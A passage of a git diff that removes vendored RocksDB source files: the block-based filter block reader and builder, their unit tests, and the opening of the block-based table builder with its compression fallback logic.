-    tmp_entries_[i] = Slice(base, length);
-  }
-
-  // Generate filter for current set of keys and append to result_.
-  filter_offsets_.push_back(static_cast<uint32_t>(result_.size()));
-  policy_->CreateFilter(&tmp_entries_[0], static_cast<int>(num_entries),
-                        &result_);
-
-  tmp_entries_.clear();
-  entries_.clear();
-  start_.clear();
-  prev_prefix_start_ = 0;
-  prev_prefix_size_ = 0;
-}
-
-BlockBasedFilterBlockReader::BlockBasedFilterBlockReader(
-    const SliceTransform* prefix_extractor,
-    const BlockBasedTableOptions& table_opt, bool _whole_key_filtering,
-    BlockContents&& contents, Statistics* stats)
-    : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering),
-      policy_(table_opt.filter_policy.get()),
-      prefix_extractor_(prefix_extractor),
-      data_(nullptr),
-      offset_(nullptr),
-      num_(0),
-      base_lg_(0),
-      contents_(std::move(contents)) {
-  assert(policy_);
-  size_t n = contents_.data.size();
-  if (n < 5) return;  // 1 byte for base_lg_ and 4 for start of offset array
-  base_lg_ = contents_.data[n - 1];
-  uint32_t last_word = DecodeFixed32(contents_.data.data() + n - 5);
-  if (last_word > n - 5) return;
-  data_ = contents_.data.data();
-  offset_ = data_ + last_word;
-  num_ = (n - 5 - last_word) / 4;
-}
-
-bool BlockBasedFilterBlockReader::KeyMayMatch(
-    const Slice& key, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(block_offset != kNotValid);
-  if (!whole_key_filtering_) {
-    return true;
-  }
-  return MayMatch(key, block_offset);
-}
-
-bool BlockBasedFilterBlockReader::PrefixMayMatch(
-    const Slice& prefix, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(block_offset != kNotValid);
-  if (!prefix_extractor_) {
-    return true;
-  }
-  return MayMatch(prefix, block_offset);
-}
-
-bool BlockBasedFilterBlockReader::MayMatch(const Slice& entry,
-                                           uint64_t block_offset) {
-  uint64_t index = block_offset >> base_lg_;
-  if (index < num_) {
-    uint32_t start = DecodeFixed32(offset_ + index * 4);
-    uint32_t limit = DecodeFixed32(offset_ + index * 4 + 4);
-    if (start <= limit && limit <= (uint32_t)(offset_ - data_)) {
-      Slice filter = Slice(data_ + start, limit - start);
-      bool const may_match = policy_->KeyMayMatch(entry, filter);
-      if (may_match) {
-        PERF_COUNTER_ADD(bloom_sst_hit_count, 1);
-        return true;
-      } else {
-        PERF_COUNTER_ADD(bloom_sst_miss_count, 1);
-        return false;
-      }
-    } else if (start == limit) {
-      // Empty filters do not match any entries
-      return false;
-    }
-  }
-  return true;  // Errors are treated as potential matches
-}
-
-size_t BlockBasedFilterBlockReader::ApproximateMemoryUsage() const {
-  return num_ * 4 + 5 + (offset_ - data_);
-}
-
-std::string BlockBasedFilterBlockReader::ToString() const {
-  std::string result, filter_meta;
-  result.reserve(1024);
-
-  std::string s_bo("Block offset"), s_hd("Hex dump"), s_fb("# filter blocks");
-  AppendItem(&result, s_fb, rocksdb::ToString(num_));
-  AppendItem(&result, s_bo, s_hd);
-
-  for (size_t index = 0; index < num_; index++) {
-    uint32_t start = DecodeFixed32(offset_ + index * 4);
-    uint32_t limit = DecodeFixed32(offset_ + index * 4 + 4);
-
-    if (start != limit) {
-      result.append(" filter block # " + rocksdb::ToString(index + 1) + "\n");
-      Slice filter = Slice(data_ + start, limit - start);
-      AppendItem(&result, start, filter.ToString(true));
-    }
-  }
-  return result;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_filter_block.h b/thirdparty/rocksdb/table/block_based_filter_block.h
deleted file mode 100644
index 52b79fe..0000000
--- a/thirdparty/rocksdb/table/block_based_filter_block.h
+++ /dev/null
@@ -1,112 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A filter block is stored near the end of a Table file.  It contains
-// filters (e.g., bloom filters) for all data blocks in the table combined
-// into a single filter block.
-
-#pragma once
-
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <memory>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "table/filter_block.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-
-// A BlockBasedFilterBlockBuilder is used to construct all of the filters for a
-// particular Table.  It generates a single string which is stored as
-// a special block in the Table.
-//
-// The sequence of calls to BlockBasedFilterBlockBuilder must match the regexp:
-//      (StartBlock Add*)* Finish
-class BlockBasedFilterBlockBuilder : public FilterBlockBuilder {
- public:
-  BlockBasedFilterBlockBuilder(const SliceTransform* prefix_extractor,
-      const BlockBasedTableOptions& table_opt);
-
-  virtual bool IsBlockBased() override { return true; }
-  virtual void StartBlock(uint64_t block_offset) override;
-  virtual void Add(const Slice& key) override;
-  virtual Slice Finish(const BlockHandle& tmp, Status* status) override;
-  using FilterBlockBuilder::Finish;
-
- private:
-  void AddKey(const Slice& key);
-  void AddPrefix(const Slice& key);
-  void GenerateFilter();
-
-  // important: all of these might point to invalid addresses
-  // at the time of destruction of this filter block. destructor
-  // should NOT dereference them.
-  const FilterPolicy* policy_;
-  const SliceTransform* prefix_extractor_;
-  bool whole_key_filtering_;
-
-  size_t prev_prefix_start_;        // the position of the last appended prefix
-                                    // to "entries_".
-  size_t prev_prefix_size_;         // the length of the last appended prefix to
-                                    // "entries_".
-  std::string entries_;             // Flattened entry contents
-  std::vector<size_t> start_;       // Starting index in entries_ of each entry
-  std::string result_;              // Filter data computed so far
-  std::vector<Slice> tmp_entries_;  // policy_->CreateFilter() argument
-  std::vector<uint32_t> filter_offsets_;
-
-  // No copying allowed
-  BlockBasedFilterBlockBuilder(const BlockBasedFilterBlockBuilder&);
-  void operator=(const BlockBasedFilterBlockBuilder&);
-};
-
-// A FilterBlockReader is used to parse filter from SST table.
-// KeyMayMatch and PrefixMayMatch would trigger filter checking
-class BlockBasedFilterBlockReader : public FilterBlockReader {
- public:
-  // REQUIRES: "contents" and *policy must stay live while *this is live.
-  BlockBasedFilterBlockReader(const SliceTransform* prefix_extractor,
-                              const BlockBasedTableOptions& table_opt,
-                              bool whole_key_filtering,
-                              BlockContents&& contents, Statistics* statistics);
-  virtual bool IsBlockBased() override { return true; }
-  virtual bool KeyMayMatch(
-      const Slice& key, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual bool PrefixMayMatch(
-      const Slice& prefix, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual size_t ApproximateMemoryUsage() const override;
-
-  // convert this object to a human readable form
-  std::string ToString() const override;
-
- private:
-  const FilterPolicy* policy_;
-  const SliceTransform* prefix_extractor_;
-  const char* data_;    // Pointer to filter data (at block-start)
-  const char* offset_;  // Pointer to beginning of offset array (at block-end)
-  size_t num_;          // Number of entries in offset array
-  size_t base_lg_;      // Encoding parameter (see kFilterBaseLg in .cc file)
-  BlockContents contents_;
-
-  bool MayMatch(const Slice& entry, uint64_t block_offset);
-
-  // No copying allowed
-  BlockBasedFilterBlockReader(const BlockBasedFilterBlockReader&);
-  void operator=(const BlockBasedFilterBlockReader&);
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_filter_block_test.cc b/thirdparty/rocksdb/table/block_based_filter_block_test.cc
deleted file mode 100644
index f666ba2..0000000
--- a/thirdparty/rocksdb/table/block_based_filter_block_test.cc
+++ /dev/null
@@ -1,248 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_filter_block.h"
-
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-#include "util/hash.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// For testing: emit an array with one hash value per key
-class TestHashFilter : public FilterPolicy {
- public:
-  virtual const char* Name() const override { return "TestHashFilter"; }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    for (int i = 0; i < n; i++) {
-      uint32_t h = Hash(keys[i].data(), keys[i].size(), 1);
-      PutFixed32(dst, h);
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& filter) const override {
-    uint32_t h = Hash(key.data(), key.size(), 1);
-    for (unsigned int i = 0; i + 4 <= filter.size(); i += 4) {
-      if (h == DecodeFixed32(filter.data() + i)) {
-        return true;
-      }
-    }
-    return false;
-  }
-};
-
-class FilterBlockTest : public testing::Test {
- public:
-  TestHashFilter policy_;
-  BlockBasedTableOptions table_options_;
-
-  FilterBlockTest() {
-    table_options_.filter_policy.reset(new TestHashFilter());
-  }
-};
-
-TEST_F(FilterBlockTest, EmptyBuilder) {
-  BlockBasedFilterBlockBuilder builder(nullptr, table_options_);
-  BlockContents block(builder.Finish(), false, kNoCompression);
-  ASSERT_EQ("\\x00\\x00\\x00\\x00\\x0b", EscapeString(block.data));
-  BlockBasedFilterBlockReader reader(nullptr, table_options_, true,
-                                     std::move(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 100000));
-}
-
-TEST_F(FilterBlockTest, SingleChunk) {
-  BlockBasedFilterBlockBuilder builder(nullptr, table_options_);
-  builder.StartBlock(100);
-  builder.Add("foo");
-  builder.Add("bar");
-  builder.Add("box");
-  builder.StartBlock(200);
-  builder.Add("box");
-  builder.StartBlock(300);
-  builder.Add("hello");
-  BlockContents block(builder.Finish(), false, kNoCompression);
-  BlockBasedFilterBlockReader reader(nullptr, table_options_, true,
-                                     std::move(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("bar", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("box", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("hello", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 100));
-  ASSERT_TRUE(!reader.KeyMayMatch("missing", 100));
-  ASSERT_TRUE(!reader.KeyMayMatch("other", 100));
-}
-
-TEST_F(FilterBlockTest, MultiChunk) {
-  BlockBasedFilterBlockBuilder builder(nullptr, table_options_);
-
-  // First filter
-  builder.StartBlock(0);
-  builder.Add("foo");
-  builder.StartBlock(2000);
-  builder.Add("bar");
-
-  // Second filter
-  builder.StartBlock(3100);
-  builder.Add("box");
-
-  // Third filter is empty
-
-  // Last filter
-  builder.StartBlock(9000);
-  builder.Add("box");
-  builder.Add("hello");
-
-  BlockContents block(builder.Finish(), false, kNoCompression);
-  BlockBasedFilterBlockReader reader(nullptr, table_options_, true,
-                                     std::move(block), nullptr);
-
-  // Check first filter
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader.KeyMayMatch("bar", 2000));
-  ASSERT_TRUE(!reader.KeyMayMatch("box", 0));
-  ASSERT_TRUE(!reader.KeyMayMatch("hello", 0));
-
-  // Check second filter
-  ASSERT_TRUE(reader.KeyMayMatch("box", 3100));
-  ASSERT_TRUE(!reader.KeyMayMatch("foo", 3100));
-  ASSERT_TRUE(!reader.KeyMayMatch("bar", 3100));
-  ASSERT_TRUE(!reader.KeyMayMatch("hello", 3100));
-
-  // Check third filter (empty)
-  ASSERT_TRUE(!reader.KeyMayMatch("foo", 4100));
-  ASSERT_TRUE(!reader.KeyMayMatch("bar", 4100));
-  ASSERT_TRUE(!reader.KeyMayMatch("box", 4100));
-  ASSERT_TRUE(!reader.KeyMayMatch("hello", 4100));
-
-  // Check last filter
-  ASSERT_TRUE(reader.KeyMayMatch("box", 9000));
-  ASSERT_TRUE(reader.KeyMayMatch("hello", 9000));
-  ASSERT_TRUE(!reader.KeyMayMatch("foo", 9000));
-  ASSERT_TRUE(!reader.KeyMayMatch("bar", 9000));
-}
-
-// Test for block based filter block
-// use new interface in FilterPolicy to create filter builder/reader
-class BlockBasedFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  BlockBasedFilterBlockTest() {
-    table_options_.filter_policy.reset(NewBloomFilterPolicy(10));
-  }
-
-  ~BlockBasedFilterBlockTest() {}
-};
-
-TEST_F(BlockBasedFilterBlockTest, BlockBasedEmptyBuilder) {
-  FilterBlockBuilder* builder = new BlockBasedFilterBlockBuilder(
-      nullptr, table_options_);
-  BlockContents block(builder->Finish(), false, kNoCompression);
-  ASSERT_EQ("\\x00\\x00\\x00\\x00\\x0b", EscapeString(block.data));
-  FilterBlockReader* reader = new BlockBasedFilterBlockReader(
-      nullptr, table_options_, true, std::move(block), nullptr);
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 100000));
-
-  delete builder;
-  delete reader;
-}
-
-TEST_F(BlockBasedFilterBlockTest, BlockBasedSingleChunk) {
-  FilterBlockBuilder* builder = new BlockBasedFilterBlockBuilder(
-      nullptr, table_options_);
-  builder->StartBlock(100);
-  builder->Add("foo");
-  builder->Add("bar");
-  builder->Add("box");
-  builder->StartBlock(200);
-  builder->Add("box");
-  builder->StartBlock(300);
-  builder->Add("hello");
-  BlockContents block(builder->Finish(), false, kNoCompression);
-  FilterBlockReader* reader = new BlockBasedFilterBlockReader(
-      nullptr, table_options_, true, std::move(block), nullptr);
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("bar", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("box", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("hello", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 100));
-  ASSERT_TRUE(!reader->KeyMayMatch("missing", 100));
-  ASSERT_TRUE(!reader->KeyMayMatch("other", 100));
-
-  delete builder;
-  delete reader;
-}
-
-TEST_F(BlockBasedFilterBlockTest, BlockBasedMultiChunk) {
-  FilterBlockBuilder* builder = new BlockBasedFilterBlockBuilder(
-      nullptr, table_options_);
-
-  // First filter
-  builder->StartBlock(0);
-  builder->Add("foo");
-  builder->StartBlock(2000);
-  builder->Add("bar");
-
-  // Second filter
-  builder->StartBlock(3100);
-  builder->Add("box");
-
-  // Third filter is empty
-
-  // Last filter
-  builder->StartBlock(9000);
-  builder->Add("box");
-  builder->Add("hello");
-
-  BlockContents block(builder->Finish(), false, kNoCompression);
-  FilterBlockReader* reader = new BlockBasedFilterBlockReader(
-      nullptr, table_options_, true, std::move(block), nullptr);
-
-  // Check first filter
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader->KeyMayMatch("bar", 2000));
-  ASSERT_TRUE(!reader->KeyMayMatch("box", 0));
-  ASSERT_TRUE(!reader->KeyMayMatch("hello", 0));
-
-  // Check second filter
-  ASSERT_TRUE(reader->KeyMayMatch("box", 3100));
-  ASSERT_TRUE(!reader->KeyMayMatch("foo", 3100));
-  ASSERT_TRUE(!reader->KeyMayMatch("bar", 3100));
-  ASSERT_TRUE(!reader->KeyMayMatch("hello", 3100));
-
-  // Check third filter (empty)
-  ASSERT_TRUE(!reader->KeyMayMatch("foo", 4100));
-  ASSERT_TRUE(!reader->KeyMayMatch("bar", 4100));
-  ASSERT_TRUE(!reader->KeyMayMatch("box", 4100));
-  ASSERT_TRUE(!reader->KeyMayMatch("hello", 4100));
-
-  // Check last filter
-  ASSERT_TRUE(reader->KeyMayMatch("box", 9000));
-  ASSERT_TRUE(reader->KeyMayMatch("hello", 9000));
-  ASSERT_TRUE(!reader->KeyMayMatch("foo", 9000));
-  ASSERT_TRUE(!reader->KeyMayMatch("bar", 9000));
-
-  delete builder;
-  delete reader;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/block_based_table_builder.cc b/thirdparty/rocksdb/table/block_based_table_builder.cc
deleted file mode 100644
index e82f91a..0000000
--- a/thirdparty/rocksdb/table/block_based_table_builder.cc
+++ /dev/null
@@ -1,870 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_table_builder.h"
-
-#include <assert.h>
-#include <stdio.h>
-
-#include <list>
-#include <map>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <utility>
-
-#include "db/dbformat.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/table.h"
-
-#include "table/block.h"
-#include "table/block_based_filter_block.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_based_table_reader.h"
-#include "table/block_builder.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/full_filter_block.h"
-#include "table/meta_blocks.h"
-#include "table/table_builder.h"
-
-#include "util/string_util.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/stop_watch.h"
-#include "util/xxhash.h"
-
-#include "table/index_builder.h"
-#include "table/partitioned_filter_block.h"
-
-namespace rocksdb {
-
-extern const std::string kHashIndexPrefixesBlock;
-extern const std::string kHashIndexPrefixesMetadataBlock;
-
-typedef BlockBasedTableOptions::IndexType IndexType;
-
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace {
-
-// Create a filter block builder based on its type.
-FilterBlockBuilder* CreateFilterBlockBuilder(
-    const ImmutableCFOptions& opt, const BlockBasedTableOptions& table_opt,
-    PartitionedIndexBuilder* const p_index_builder) {
-  if (table_opt.filter_policy == nullptr) return nullptr;
-
-  FilterBitsBuilder* filter_bits_builder =
-      table_opt.filter_policy->GetFilterBitsBuilder();
-  if (filter_bits_builder == nullptr) {
-    return new BlockBasedFilterBlockBuilder(opt.prefix_extractor, table_opt);
-  } else {
-    if (table_opt.partition_filters) {
-      assert(p_index_builder != nullptr);
-      // Since after partition cut request from filter builder it takes time
-      // until index builder actully cuts the partition, we take the lower bound
-      // as partition size.
-      assert(table_opt.block_size_deviation <= 100);
-      auto partition_size = static_cast<uint32_t>(
-          table_opt.metadata_block_size *
-          (100 - table_opt.block_size_deviation));
-      partition_size = std::max(partition_size, static_cast<uint32_t>(1));
-      return new PartitionedFilterBlockBuilder(
-          opt.prefix_extractor, table_opt.whole_key_filtering,
-          filter_bits_builder, table_opt.index_block_restart_interval,
-          p_index_builder, partition_size);
-    } else {
-      return new FullFilterBlockBuilder(opt.prefix_extractor,
-                                        table_opt.whole_key_filtering,
-                                        filter_bits_builder);
-    }
-  }
-}
-
-bool GoodCompressionRatio(size_t compressed_size, size_t raw_size) {
-  // Check to see if compressed less than 12.5%
-  return compressed_size < raw_size - (raw_size / 8u);
-}
-
-}  // namespace
-
-// format_version is the block format as defined in include/rocksdb/table.h
-Slice CompressBlock(const Slice& raw,
-                    const CompressionOptions& compression_options,
-                    CompressionType* type, uint32_t format_version,
-                    const Slice& compression_dict,
-                    std::string* compressed_output) {
-  if (*type == kNoCompression) {
-    return raw;
-  }
-
-  // Will return compressed block contents if (1) the compression method is
-  // supported in this platform and (2) the compression rate is "good enough".
-  switch (*type) {
-    case kSnappyCompression:
-      if (Snappy_Compress(compression_options, raw.data(), raw.size(),
-                          compressed_output) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kZlibCompression:
-      if (Zlib_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kZlibCompression, format_version),
-              raw.data(), raw.size(), compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kBZip2Compression:
-      if (BZip2_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kBZip2Compression, format_version),
-              raw.data(), raw.size(), compressed_output) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kLZ4Compression:
-      if (LZ4_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kLZ4Compression, format_version),
-              raw.data(), raw.size(), compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kLZ4HCCompression:
-      if (LZ4HC_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kLZ4HCCompression, format_version),
-              raw.data(), raw.size(), compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;     // fall back to no compression.
-    case kXpressCompression:
-      if (XPRESS_Compress(raw.data(), raw.size(),
-          compressed_output) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;
-    case kZSTD:
-    case kZSTDNotFinalCompression:
-      if (ZSTD_Compress(compression_options, raw.data(), raw.size(),
-                        compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;     // fall back to no compression.
-    default: {}  // Do not recognize this compression type
-  }
-
-  // Compression method is not supported, or not good compression ratio, so just
-  // fall back to uncompressed form.
-  *type = kNoCompression;
-  return raw;
-}
-
-// kBlockBasedTableMagicNumber was picked by running
-//    echo rocksdb.table.block_based | sha1sum
-// and taking the leading 64 bits.
-// Please note that kBlockBasedTableMagicNumber may also be accessed by other
-// .cc files
-// for that reason we declare it extern in the header but to get the space
-// allocated
-// it must be not extern in one place.
-const uint64_t kBlockBasedTableMagicNumber = 0x88e241b785f4cff7ull;
-// We also support reading and writing legacy block based table format (for
-// backwards compatibility)
-const uint64_t kLegacyBlockBasedTableMagicNumber = 0xdb4775248b80fb57ull;
-
-// A collector that collects properties of interest to block-based table.
-// For now this class looks heavy-weight since we only write one additional
-// property.
-// But in the foreseeable future, we will add more and more properties that are
-// specific to block-based table.
-class BlockBasedTableBuilder::BlockBasedTablePropertiesCollector
-    : public IntTblPropCollector {
- public:
-  explicit BlockBasedTablePropertiesCollector(
-      BlockBasedTableOptions::IndexType index_type, bool whole_key_filtering,
-      bool prefix_filtering)
-      : index_type_(index_type),
-        whole_key_filtering_(whole_key_filtering),
-        prefix_filtering_(prefix_filtering) {}
-
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override {
-    // Intentionally left blank. Have no interest in collecting stats for
-    // individual key/value pairs.
-    return Status::OK();
-  }
-
-  virtual Status Finish(UserCollectedProperties* properties) override {
-    std::string val;
-    PutFixed32(&val, static_cast<uint32_t>(index_type_));
-    properties->insert({BlockBasedTablePropertyNames::kIndexType, val});
-    properties->insert({BlockBasedTablePropertyNames::kWholeKeyFiltering,
-                        whole_key_filtering_ ? kPropTrue : kPropFalse});
-    properties->insert({BlockBasedTablePropertyNames::kPrefixFiltering,
-                        prefix_filtering_ ? kPropTrue : kPropFalse});
-    return Status::OK();
-  }
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const override {
-    return "BlockBasedTablePropertiesCollector";
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    // Intentionally left blank.
-    return UserCollectedProperties();
-  }
-
- private:
-  BlockBasedTableOptions::IndexType index_type_;
-  bool whole_key_filtering_;
-  bool prefix_filtering_;
-};
-
-struct BlockBasedTableBuilder::Rep {
-  const ImmutableCFOptions ioptions;
-  const BlockBasedTableOptions table_options;
-  const InternalKeyComparator& internal_comparator;
-  WritableFileWriter* file;
-  uint64_t offset = 0;
-  Status status;
-  BlockBuilder data_block;
-  BlockBuilder range_del_block;
-
-  InternalKeySliceTransform internal_prefix_transform;
-  std::unique_ptr<IndexBuilder> index_builder;
-  PartitionedIndexBuilder* p_index_builder_ = nullptr;
-
-  std::string last_key;
-  const CompressionType compression_type;
-  const CompressionOptions compression_opts;
-  // Data for presetting the compression library's dictionary, or nullptr.
-  const std::string* compression_dict;
-  TableProperties props;
-
-  bool closed = false;  // Either Finish() or Abandon() has been called.
-  std::unique_ptr<FilterBlockBuilder> filter_builder;
-  char compressed_cache_key_prefix[BlockBasedTable::kMaxCacheKeyPrefixSize];
-  size_t compressed_cache_key_prefix_size;
-
-  BlockHandle pending_handle;  // Handle to add to index block
-
-  std::string compressed_output;
-  std::unique_ptr<FlushBlockPolicy> flush_block_policy;
-  uint32_t column_family_id;
-  const std::string& column_family_name;
-  uint64_t creation_time = 0;
-  uint64_t oldest_key_time = 0;
-
-  std::vector<std::unique_ptr<IntTblPropCollector>> table_properties_collectors;
-
-  Rep(const ImmutableCFOptions& _ioptions,
-      const BlockBasedTableOptions& table_opt,
-      const InternalKeyComparator& icomparator,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          int_tbl_prop_collector_factories,
-      uint32_t _column_family_id, WritableFileWriter* f,
-      const CompressionType _compression_type,
-      const CompressionOptions& _compression_opts,
-      const std::string* _compression_dict, const bool skip_filters,
-      const std::string& _column_family_name, const uint64_t _creation_time,
-      const uint64_t _oldest_key_time)
-      : ioptions(_ioptions),
-        table_options(table_opt),
-        internal_comparator(icomparator),
-        file(f),
-        data_block(table_options.block_restart_interval,
-                   table_options.use_delta_encoding),
-        range_del_block(1),  // TODO(andrewkr): restart_interval unnecessary
-        internal_prefix_transform(_ioptions.prefix_extractor),
-        compression_type(_compression_type),
-        compression_opts(_compression_opts),
-        compression_dict(_compression_dict),
-        flush_block_policy(
-            table_options.flush_block_policy_factory->NewFlushBlockPolicy(
-                table_options, data_block)),
-        column_family_id(_column_family_id),
-        column_family_name(_column_family_name),
-        creation_time(_creation_time),
-        oldest_key_time(_oldest_key_time) {
-    if (table_options.index_type ==
-        BlockBasedTableOptions::kTwoLevelIndexSearch) {
-      p_index_builder_ = PartitionedIndexBuilder::CreateIndexBuilder(
-          &internal_comparator, table_options);
-      index_builder.reset(p_index_builder_);
-    } else {
-      index_builder.reset(IndexBuilder::CreateIndexBuilder(
-          table_options.index_type, &internal_comparator,
-          &this->internal_prefix_transform, table_options));
-    }
-    if (skip_filters) {
-      filter_builder = nullptr;
-    } else {
-      filter_builder.reset(
-          CreateFilterBlockBuilder(_ioptions, table_options, p_index_builder_));
-    }
-
-    for (auto& collector_factories : *int_tbl_prop_collector_factories) {
-      table_properties_collectors.emplace_back(
-          collector_factories->CreateIntTblPropCollector(column_family_id));
-    }
-    table_properties_collectors.emplace_back(
-        new BlockBasedTablePropertiesCollector(
-            table_options.index_type, table_options.whole_key_filtering,
-            _ioptions.prefix_extractor != nullptr));
-  }
-};
-
-BlockBasedTableBuilder::BlockBasedTableBuilder(
-    const ImmutableCFOptions& ioptions,
-    const BlockBasedTableOptions& table_options,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, WritableFileWriter* file,
-    const CompressionType compression_type,
-    const CompressionOptions& compression_opts,
-    const std::string* compression_dict, const bool skip_filters,
-    const std::string& column_family_name, const uint64_t creation_time,
-    const uint64_t oldest_key_time) {
-  BlockBasedTableOptions sanitized_table_options(table_options);
-  if (sanitized_table_options.format_version == 0 &&
-      sanitized_table_options.checksum != kCRC32c) {
-    ROCKS_LOG_WARN(
-        ioptions.info_log,
-        "Silently converting format_version to 1 because checksum is "
-        "non-default");
-    // silently convert format_version to 1 to keep consistent with current
-    // behavior
-    sanitized_table_options.format_version = 1;
-  }
-
-  rep_ =
-      new Rep(ioptions, sanitized_table_options, internal_comparator,
-              int_tbl_prop_collector_factories, column_family_id, file,
-              compression_type, compression_opts, compression_dict,
-              skip_filters, column_family_name, creation_time, oldest_key_time);
-
-  if (rep_->filter_builder != nullptr) {
-    rep_->filter_builder->StartBlock(0);
-  }
-  if (table_options.block_cache_compressed.get() != nullptr) {
-    BlockBasedTable::GenerateCachePrefix(
-        table_options.block_cache_compressed.get(), file->writable_file(),
-        &rep_->compressed_cache_key_prefix[0],
-        &rep_->compressed_cache_key_prefix_size);
-  }
-}
-
-BlockBasedTableBuilder::~BlockBasedTableBuilder() {
-  assert(rep_->closed);  // Catch errors where caller forgot to call Finish()
-  delete rep_;
-}
-
-void BlockBasedTableBuilder::Add(const Slice& key, const Slice& value) {
-  Rep* r = rep_;
-  assert(!r->closed);
-  if (!ok()) return;
-  ValueType value_type = ExtractValueType(key);
-  if (IsValueType(value_type)) {
-    if (r->props.num_entries > 0) {
-      assert(r->internal_comparator.Compare(key, Slice(r->last_key)) > 0);
-    }
-
-    auto should_flush = r->flush_block_policy->Update(key, value);
-    if (should_flush) {
-      assert(!r->data_block.empty());
-      Flush();
-
-      // Add item to index block.
-      // We do not emit the index entry for a block until we have seen the
-      // first key for the next data block.  This allows us to use shorter
-      // keys in the index block.  For example, consider a block boundary
